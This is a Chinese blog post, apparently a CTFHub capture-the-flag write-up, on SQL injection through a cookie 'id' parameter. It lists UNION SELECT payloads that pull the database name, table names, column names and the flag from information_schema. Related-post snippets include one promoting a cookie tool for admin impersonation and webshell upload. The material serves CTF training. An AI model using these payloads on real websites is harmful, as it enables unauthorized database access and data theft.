CTFHub-web(cookie注入)

最新推荐文章于 2023-11-18 11:52:55 发布
最新推荐文章于 2023-11-18 11:52:55 发布
阅读量2.4k 收藏 7
点赞数 2
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45254208/article/details/108171109
版权

1. 题目
在这里插入图片描述

2. 浏览器F12审查
在这里插入图片描述

3. 抓包
在这里插入图片描述

4. cookie注入,获取数据库信息

id=0 union select database(),version();

在这里插入图片描述
在这里插入图片描述

5. 获取数据库sqli中的表名

id = 0 union select 1,group_concat(table_name) from
	information_schema.tables where table_schema='sqli'

在这里插入图片描述
在这里插入图片描述

6. 获取数据表oikfkadpry中的字段名

id=0 union select 1,group_concat(column_name) from
	information_schema.columns where table_name='oikfkadpry';

在这里插入图片描述
在这里插入图片描述

7. 获取字段nciapffkhv的值

id=0 union select 1,group_concat(nciapffkhv) from oikfkadpry;

在这里插入图片描述
在这里插入图片描述

hangshao0.0
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
基于Cookie劫持的Deep-Web用户数据安全性分析
02-24
通过对主流社交网络和电子商务网站实施Cookie劫持攻击实验,发现虽然Deep-Web网站提供了诸如HTTPS协议等的安全保障措施,但大多数并不能抵御Cookie劫持攻击.攻击者可以仿冒合法用户行为,获取用户信息.最后,对实验结果...
CTFHub - Cookie注入
Have_a_great_day的博客
09-10 727
因为在CTFHubweb内SQL板块使用的是同一个数据库,所以列数是相同的。table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 1568
根据网页显示内容提示,这题关于 Cookie 注入Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHub | Cookie
尼泊罗河伯的博客
09-29 2207
根据题目描述内容,这是一道关于浏览器 Cookie 的问题。网页提示只有管理员才能获得flag,那么可以通过修改 Cookie 值,将 0(False) 改为 1(True) 获得此题 flag 。
CTFHub技能树之WEBCookie注入
weixin_48799157的博客
03-20 1272
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
tiny-cookie:一个用于浏览器的小型 cookie 操作插件
05-31
如果您使用过 tiny-cookie,那么您可能会对感兴趣,这是一个专注于 Web 开发的函数集合。 安装 新产品管理: npm install tiny-cookie 用法 ES2015(推荐) // You can import all methods. import * as Cookies...
马哥cookie强力注入工具
10-19
利用Cookie欺骗攻击网站,用“ Cookie强力注入修改工具”向该站服务器提交管理员Cookie,这样即可冒充管理员绕过密码验证登入后台,然后再通过后台的上传功能上传木马拿下 Webshell
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
# pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # ...
CTFHUB-WEB前置技能-HTTP协议-Cookie
K_ShenH的博客
06-09 722
CTFHUB-WEB前置技能-HTTP协议-Cookie
CTFHUB-Cookie注入
Web学习之路
03-28 193
cookie
ctfhub-HTTP协议-Cookie
m0_62094846的博客
11-06 637
这是道cookie题,又说要admin才能得到flag,应该是要伪造cookie,抓包 一开始我以为admin后面要写用户名或者密码啥的,然后就爆破,一直爆不出来 ,然后把0改成1,就可以出来flag 我在网上查时,cookie的一行应该为一条数据。也就是说这条数据的“名字”叫做admin,其值为0,改成就可以出来,但我用2,又不行了。 Cookie组成: Cookie是一段不超过4KB的小型文本数据,由一个名称(Name)、一个值(Value)和其它几个用于控制Cook...
CTF学习记录006-Cookie欺骗、认证、伪造
wupeng_ccab的博客
09-14 573
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
学习记录 3 —— CTFHub Cookie
m0_56200845的博客
10-29 713
题目如上。 审题:Cookie欺骗、认证、伪造。这道题涉及到cookie的相关知识。 相关知识: Cookie简单来说就类似于现实生活中身份证这类东西,用于认证登录者的。 其产生原因与原理:HTTP 是无状态协议,它不对之前发生过的请求和响应的状态进行管理。也就是说, 无法根据之前的状态进行本次的请求处理。假设要求登录认证的 Web 页面本身无法进行状态的管理(不记录已登录的状态),那么每次跳转新页面不是要再次登录,就是要在每次请求报文中附加参数来管理登录状态。不可否认,无状态协议当然也有它的...
CTFHub | Cookie注入,UA注入,Refer注入,过滤空格(利用hackbar插件)
最新发布
qq_73861475的博客
11-18 824
User-Agent 首部包含了一个特征字符串,用来让网络协议的对端来识别发起请求的用户代理软件的应用类型、操作系统、软件开发商以及版本号。一些网站会把用户的 UA 首部信息写入数据库,用来收集和统计用户信息,如果操作不当就有可能会导致 UA 注入。【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)_sql注入教程_网络安全-李彦暗的博客-CSDN博客1、界面能够回显数据库查询到的数据(必要条件);2、界面回显内容至少能够显示数据库中的某列数据(必要条件);
CTF---Web---SQL注入---08---Cookie注入
qq_22160557的博客
07-31 342
文章目录前言一、题目描述二、解题步骤1、找注入点2、爆库、表、列、字段三、总结 前言 题目分类: CTFWeb—SQL注入—08—Cookie注入 一、题目描述 题目:cookie注入 二、解题步骤 1、找注入点 Step1:Cookie: id=0,1 union select 1,2,3 – l 此题的注入点是cookie中的id。 order by 只能在limit前使用,所以这里用不了order by,只能用union select 来判断字段数 2、爆库、表、列、字段 Step2:爆库 C
CTFHub技能树HTTP协议——Cookie
qq_53768302的博客
03-07 225
CTFHub技能树HTTP协议——Cookie
CTFHUB技能树HTTP协议
winofkill的博客
11-21 4721
ctfhub技能树http协议,请求方式,302跳转,cookie,基础认证,响应包源代码
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入”是一种常见的网络攻击手段,通过在输入框等可输入的地方输入特定的数据库操作语句,来实现对数据库的非授权操作。 最后,“cookie”是指在网站上存储用户信息的一种机制,可以通过注入SQL语句来获取其中的敏感信息,如账号密码等。 综上,这道题的意思是在一个CTFHub比赛的环境下,需要使用SQL注入来获取网站的cookie信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值